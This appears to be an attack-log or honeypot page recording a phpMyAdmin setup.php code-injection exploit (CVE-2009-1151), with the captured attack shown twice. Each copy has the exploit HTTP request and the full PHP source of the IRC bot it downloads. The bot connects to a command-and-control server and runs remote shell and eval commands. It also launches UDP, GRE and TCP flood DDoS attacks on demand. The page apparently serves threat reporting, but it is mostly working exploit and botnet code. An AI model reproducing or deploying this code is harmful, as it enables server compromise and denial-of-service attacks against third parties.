oosheefee1baixeinief5nociu5shohhPOST /myadmin/scripts/setup.php HTTP/1.1
Content-Length: 235
cookie2: $Version="1"
Host: 150.152.32.232:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://150.152.32.232:8080/myadmin/scripts/setup.php
cookie: phpMyAdmin=8b9c125f60efa70aebe2644e6fcea070
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=6f7368443376d090ceb5915c78d2b83d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A28%3A%22ftp%3A%2F%2F144%2E217%2E160%2E29%2FPMA%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 05fc9af5ffbc8d487682d2275fdf4983
Type: text/x-php
Size: 19345
URL: ftp://144.217.160.29/PMA.php
Php IRC bot for phpmyadmin exploit
go to line 86 to edit irc info
<?php
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru_($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))[email protected]_exec($command);
elseif(function_exists('popen')){[email protected]($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){[email protected]_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class sell
{
var $config = array("server"=>"144.217.160.29", "port"=>"443", "key"=>"", "prefix"=>"DDOS-", "maxrand"=>"8", "chan"=>"#pma", "trigger"=>"-", "password"=>"bleed", "auth"=>"");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$pass = $this->config['password'];
$alph = range("0","9");
$this->send("PASS ".$pass."");
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $ident = "Windows";
else $ident = "Linux";
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") {
$this->auth($this->config['auth']);
$this->join($this->config['chan'],$this->config['key']);
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->join("#PMA");
else $this->join("#PMA");
continue;
}
if(isset($cmd[1]) && $cmd[1]=="443") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case "PRIVMSG":
if(substr($mcmd[0],0,1)=="-")
{
switch(substr($mcmd[0],1))
{
case "mail":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "___":
$this->privmsg($this->config['chan'], "~http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for ($i = 0; $i < count($ret); $i++)
if ($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "udp":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udptls":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpstd":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "greflood":
if(count($mcmd)>4) { $this->greflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>3) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "die":
if(count($mcmd)>0) { fclose($this->conn); exit();}
break;
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function auth($chan) { $this->send("PART ".$chan); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$prefix = "DDOS-%s";
$nickk = substr(str_shuffle("1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $this->config['maxrand']);
$this->nick = sprintf($prefix, $nickk);
$this->send("NICK ".$this->nick);
}
function udpstd($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!STD\2]");
$msgg = "STD";
for($i=0;$i<$packetsize;$i++) { $msgg .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$msgg);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2 std DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udp($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udptls($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("tls://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function greflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("gre://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("gre://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function tcp($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2tcp started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen("tcp://".$host, $port, $e, $s, 5);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'],"[\2tcp Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$poll = new sell;
$poll->start();
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
64.137.241.24
Dest. port: 8080
Time: 09/12/2018 19:52:55
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31798 DataCity
Location: Ontario, Waterloo (BlackBerry 14) (zipcode N2L)
rDNS: notassigned.cloudatcost.com
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /2phpmyadmin/scripts/setup.php HTTP/1.1
Content-Length: 235
cookie2: $Version="1"
Host: 150.152.32.232:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://150.152.32.232:8080/2phpmyadmin/scripts/setup.php
cookie: phpMyAdmin=8b9c125f60efa70aebe2644e6fcea070
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=6f7368443376d090ceb5915c78d2b83d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A28%3A%22ftp%3A%2F%2F144%2E217%2E160%2E29%2FPMA%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 05fc9af5ffbc8d487682d2275fdf4983
Type: text/x-php
Size: 19345
URL: ftp://144.217.160.29/PMA.php
Php IRC bot for phpmyadmin exploit
go to line 86 to edit irc info
<?php
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru_($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))[email protected]_exec($command);
elseif(function_exists('popen')){[email protected]($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){[email protected]_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class sell
{
var $config = array("server"=>"144.217.160.29", "port"=>"443", "key"=>"", "prefix"=>"DDOS-", "maxrand"=>"8", "chan"=>"#pma", "trigger"=>"-", "password"=>"bleed", "auth"=>"");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$pass = $this->config['password'];
$alph = range("0","9");
$this->send("PASS ".$pass."");
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $ident = "Windows";
else $ident = "Linux";
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") {
$this->auth($this->config['auth']);
$this->join($this->config['chan'],$this->config['key']);
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->join("#PMA");
else $this->join("#PMA");
continue;
}
if(isset($cmd[1]) && $cmd[1]=="443") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case "PRIVMSG":
if(substr($mcmd[0],0,1)=="-")
{
switch(substr($mcmd[0],1))
{
case "mail":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "___":
$this->privmsg($this->config['chan'], "~http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for ($i = 0; $i < count($ret); $i++)
if ($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "udp":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udptls":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpstd":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "greflood":
if(count($mcmd)>4) { $this->greflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>3) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "die":
if(count($mcmd)>0) { fclose($this->conn); exit();}
break;
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function auth($chan) { $this->send("PART ".$chan); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$prefix = "DDOS-%s";
$nickk = substr(str_shuffle("1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $this->config['maxrand']);
$this->nick = sprintf($prefix, $nickk);
$this->send("NICK ".$this->nick);
}
function udpstd($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!STD\2]");
$msgg = "STD";
for($i=0;$i<$packetsize;$i++) { $msgg .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$msgg);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2 std DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udp($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udptls($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("tls://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function greflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("gre://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("gre://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function tcp($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2tcp started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen("tcp://".$host, $port, $e, $s, 5);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'],"[\2tcp Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$poll = new sell;
$poll->start();
?>